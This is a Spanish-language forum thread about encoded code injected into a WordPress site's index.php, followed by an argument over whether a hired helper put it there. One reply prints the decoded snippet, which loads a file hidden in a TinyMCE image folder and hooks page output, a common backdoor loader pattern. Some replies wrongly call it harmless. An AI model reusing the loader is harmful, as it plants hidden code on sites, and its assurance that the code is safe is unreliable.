Eliminar el código extraño en index.php al contratar usuario de Fb

• Autor Autor blogs
  • Fecha de inicio Fecha de inicio
blogs

blogs

Préstamo
Mi
codigos extraños despues de contratar a un usuarios de Fb

problema arreglado

el codigo que estaba en el index.php fue borrado

Última edición:
Ten cuidado, hace poco en mis sitios web se inyectaron ese tipo de codigo malicioso que hicieron que me pongan una alerta en google como "sitio modificado por terceros" me perjudico de tal forma que cayeron mis visitas, te aconsejo eliminarlo cuanto antes y revisa tu hosting si tienes algun archivo o carpeta extraña.

Saludos

Es un código codificado, decodificandolo queda así (Puedes sustituirlo sin problemas):

Insertar CODE, HTML o PHP:
<?php if(function_exists('ob_start')&&!isset($GLOBALS['mfsn']))
{$GLOBALS['mfsn']='/home/kari7say/public_html/xxxxx.com/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/016.php';
if(file_exists($GLOBALS['mfsn']))
{include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}} ?>

Comprueba que no sea nada malicioso.

Última edición:
me lo inyectaron a mi tambien.
fijate que esta en todo tus archivos de wordpress tambien, reinstala wordpress y limpia el template

Esos códigos codificados suelen ser usados en shells php, por eso hay que guardarles cuidado.

Normalmente se los codifica para no ser detectados, y no para no ser entendidos, pues es relativamente fácil desencriptarlos.

en esta ocasión no se dio el caso de que fuera malicioso, pero si alguien encuentra un código como ese en si hosts, debe revisarlo de inmediato.

kj

Umm me estas culpando de meter un code malicioso sin tan siquiera informaterte ?

Te comente que revisaras tu error_log tenias un code extraño que estaba causando problemas, causado por Enlace eliminado...

No se si revisaste.. pero en el error log ese code esta causando problemas antes de que yo entrara a revisar tu host..

El error_log tiene la fechas puedes revisar, investigar, asegurarte y luego culpar a alguien, pero te aseguro que yo no pongo bodigos maliciosos a nadie..

Has revisado tu pc ? estas seguro que no esta infectado y el code no se propaga por ftp ?

Cierto, Skamasle es un user que conozco de hace mucho y puedo garantizarles que el nunca haría nada de eso, es de mi total confiaza.

kj

dudo mucho que halla sido skamasle porque lo conozco hace un tiempo, siempre me a ayudado y nunca intento nada raro....

suerte con tu problema pero me parece que te equivocaste de persona..

en mi respaldo y no encuentro ese codigo en mi sitio

no puedo asegurar que el usuario Enlace eliminado fue quien puso ese codigo en mi sitio

por que no revise los archivos antes

en mi respaldo y no encuentro ese codigo en mi sitio

no puedo asegurar que el usuario Enlace eliminado fue quien puso ese codigo en mi sitio

por que no revise los archivos antes

entonces no me parece correcto que acuses gente si no estas seguro, pero bueno ahi vos...espero que lo hallas solucionado 😉

como siempre vengo trabajando con skamasle hace más de 2 años creo ya... y nunca nadie ha tenido ningún problema con el..

no se a que viene el echar culpas a un user sin tener pruebas... y si no me equivoco eso está sancionado por los moderadores

saludos
nax

Atrás